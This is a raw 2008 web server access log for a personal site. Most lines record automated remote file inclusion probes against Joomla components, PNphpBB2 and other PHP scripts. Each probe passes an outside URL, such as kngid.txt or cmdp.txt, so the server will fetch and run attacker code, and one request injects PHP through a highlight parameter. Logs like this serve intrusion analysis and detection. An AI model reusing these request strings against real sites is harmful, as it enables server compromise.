58.102.118.201 - - [10/Aug/2008:12:12:21 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:12:30 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:12:30 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:12:30 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.103.131.81 - - [10/Aug/2008:12:12:38 -0700] "GET /logs/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
66.103.131.81 - - [10/Aug/2008:12:12:38 -0700] "GET /index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 200 18477 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:12:39 -0700] "GET /logs/access_080321.log%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:12:12:43 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:12:12:43 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:12:12:44 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [10/Aug/2008:12:12:46 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:12:46 -0700] "GET /logs/access_080209.log//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:12:46 -0700] "GET /logs/access_080209.log//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:12:51 -0700] "GET //index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 18385 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:12:52 -0700] "GET /logs//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:12:53 -0700] "GET //index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 18385 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:12:54 -0700] "GET /logs//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:13:06 -0700] "GET /logs/access_080315.log/joomla/index.php?option=com_restaurante&task=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:13:14 -0700] "GET /logs/access_080315.log/joomla/index.php?option=com_restaurante&task=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:13:29 -0700] "GET /logs/access.log//index.php?name=http://seandempsey.com/temp/fastidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:13:32 -0700] "GET //index.php?name=http://seandempsey.com/temp/fastidio.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:13:32 -0700] "GET /logs//index.php?name=http://seandempsey.com/temp/fastidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:13:40 -0700] "GET /logs/access.log//index.php?name=http://seandempsey.com/temp/fastidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:13:43 -0700] "GET //index.php?name=http://seandempsey.com/temp/fastidio.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:13:44 -0700] "GET /logs//index.php?name=http://seandempsey.com/temp/fastidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:13:44 -0700] "GET /logs/access_080209.log//index.php?lang=http://www.bega-technik.de/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:13:44 -0700] "GET /logs//index.php?lang=http://www.bega-technik.de/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:13:45 -0700] "GET //index.php?lang=http://www.bega-technik.de/idfx.txt?? HTTP/1.1" 200 18395 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:14:05 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:14:06 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:14:06 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:14:07 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:12:14:15 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:12:14:15 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:12:14:15 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:12:14:15 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:12:14:15 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:12:14:16 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:12:14:17 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:12:14:18 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:12:14:18 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:14:24 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:14:24 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:14:24 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:14:29 -0700] "GET /logs/access_080302.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
204.15.10.22 - - [10/Aug/2008:12:14:57 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:12:15:15 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:12:15:17 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:12:15:30 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:12:15:31 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:12:16:08 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:12:16:08 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.66.127 - - [10/Aug/2008:12:16:42 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.127 - - [10/Aug/2008:12:16:42 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.127 - - [10/Aug/2008:12:16:43 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.245.192.26 - - [10/Aug/2008:12:18:17 -0700] "GET /logs//index.php?option=com_restaurante&task=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.245.192.26 - - [10/Aug/2008:12:18:18 -0700] "GET //index.php?option=com_restaurante&task=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 200 18495 "-" "libwww-perl/5.812" "www.dmulk.com"
77.232.68.17 - - [10/Aug/2008:12:18:25 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://neomatrix.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [10/Aug/2008:12:18:30 -0700] "GET //include/main.php?config[search_disp]=true&include_dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
194.79.75.195 - - [10/Aug/2008:12:18:30 -0700] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
70.85.102.100 - - [10/Aug/2008:12:18:48 -0700] "GET //include/main.php?config[search_disp]=true&include_dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
70.85.102.100 - - [10/Aug/2008:12:18:48 -0700] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:20:19 -0700] "GET /logs/access.log//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:20:21 -0700] "GET /logs/access.log//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:20:22 -0700] "GET //index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:20:22 -0700] "GET /logs//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:20:22 -0700] "GET //index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:20:23 -0700] "GET /logs//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:12:20:27 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/errors.php?error=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:12:20:29 -0700] "GET /administrator/components/com_joomlaradiov5/errors.php?error=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:20:29 -0700] "GET /logs/access.log//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:20:31 -0700] "GET //index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:20:31 -0700] "GET /logs//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:21:33 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:21:33 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:21:33 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.249.70.58 - - [10/Aug/2008:12:21:49 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0050.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:21:54 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.65.228.5 - - [10/Aug/2008:12:22:06 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:22:22 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:22:22 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:22:28 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:22:28 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:22:28 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:12:22:31 -0700] "GET /logs/access.log//admin/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:12:22:32 -0700] "GET //admin/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:22:35 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:12:22:48 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:12:22:48 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:12:22:49 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:12:22:49 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 200 3694 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:12:22:49 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:23:03 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.249.70.58 - - [10/Aug/2008:12:23:10 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.58 - - [10/Aug/2008:12:23:10 -0700] "GET /logs/access_071021.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:23:46 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:12:23:58 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.127 - - [10/Aug/2008:12:24:04 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.127 - - [10/Aug/2008:12:24:04 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.127 - - [10/Aug/2008:12:24:04 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.127 - - [10/Aug/2008:12:24:05 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.85.102.100 - - [10/Aug/2008:12:24:30 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:24:46 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:24:46 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:24:46 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.69.108.193 - - [10/Aug/2008:12:24:59 -0700] "GET /logs/addevent.inc.php?agendax_path=http://neomatrix.007gb.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.69.108.193 - - [10/Aug/2008:12:25:00 -0700] "GET /addevent.inc.php?agendax_path=http://neomatrix.007gb.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.65.228.5 - - [10/Aug/2008:12:25:03 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:25:14 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:25:14 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:25:14 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:25:24 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:12:25:27 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:25:28 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:25:28 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:25:28 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:25:29 -0700] "GET /logs/access_080315.log/joomla/index.php?option=com_restaurante&task=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
151.11.24.250 - - [10/Aug/2008:12:26:01 -0700] "GET /logs/errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [10/Aug/2008:12:26:06 -0700] "GET /errors.php?error=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
